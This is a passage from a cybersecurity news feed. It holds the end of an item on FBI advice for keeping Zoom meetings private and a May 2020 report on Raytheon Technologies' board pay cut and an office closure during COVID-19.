The FBI warned Zoom users to consider the privacy of any videoconferences they schedule. 

"Links to many virtual events are being shared online, resulting in a lack of vetting of approved participants," said the FBI. "Do not make meetings or classrooms public. Do not share a link to a teleconference or classroom on an unrestricted, publicly available social media post. Provide the link directly to specific attendees." 

The Bureau advised users to make their Zoom meetings private either by requiring attendees to enter a meeting password or by using the waiting room feature to control the admittance of guests.

To limit the risk of abusive content being shown, hosts can change the screen-sharing options to "Host Only." 

Categories: Cyber Risk News

Raytheon's Board Takes Voluntary Pay Cut

Info Security - Thu, 05/21/2020 - 17:34
Raytheon's Board Takes Voluntary Pay Cut

Raytheon Technologies’ board of directors is taking a voluntary pay cut as the United States continues to be impacted by COVID-19. 

The board has reduced non-employee director compensation by an amount equal to 20% of the director cash retainer. The pay cut will apply for the annual term ending at the 2021 Annual Meeting of Shareowners.

The defense giant, which is headquartered in Waltham, Massachusetts, announced the board's gesture on May 14. 

News of the resolution follows a decision by CEO Greg Hayes to institute a temporary 10% base pay reduction for all salaried employees across the company's Pratt & Whitney and Collins Aerospace Systems businesses as well as its corporate offices. 

Raytheon employs 195,000 people across four industry-leading businesses―Collins Aerospace Systems, Pratt & Whitney, Raytheon Intelligence & Space, and Raytheon Missiles & Defense. 

Temporary reductions in pay announced by Raytheon last month will go into effect from June and remain in place until the end of the year. 

Previously, CEO Greg Hayes and executive chairman Tom Kennedy had volunteered to slash their salaries by 20% for the same period.

In a statement released May 14, Raytheon said: "Raytheon Technologies continues to monitor the crisis and is responding as needed to ensure the wellbeing of its employees, customers and suppliers, while protecting the long-term financial strength of the business."

Raytheon Technologies Corporation was formed in 2020 through the combination of Raytheon Company and the United Technologies Corporation aerospace businesses. 

This week, the company confirmed that it is closing an office in Albuquerque, New Mexico, where 200 people are currently employed. 

Raytheon spokeswoman Heather Uberuaga said the company is seeking to streamline its capabilities and relocate support for key capabilities and customer programs to alternative facilities elsewhere in the United States.

"We think this move is in the best interest of our customers as we look to further integrate and streamline our capabilities with pursuits and programs located at other sites while working with employees on a case-by-case basis to explore their individual employment options going forward,” Uberuaga wrote in an email to the Albuquerque Journal.

Categories: Cyber Risk News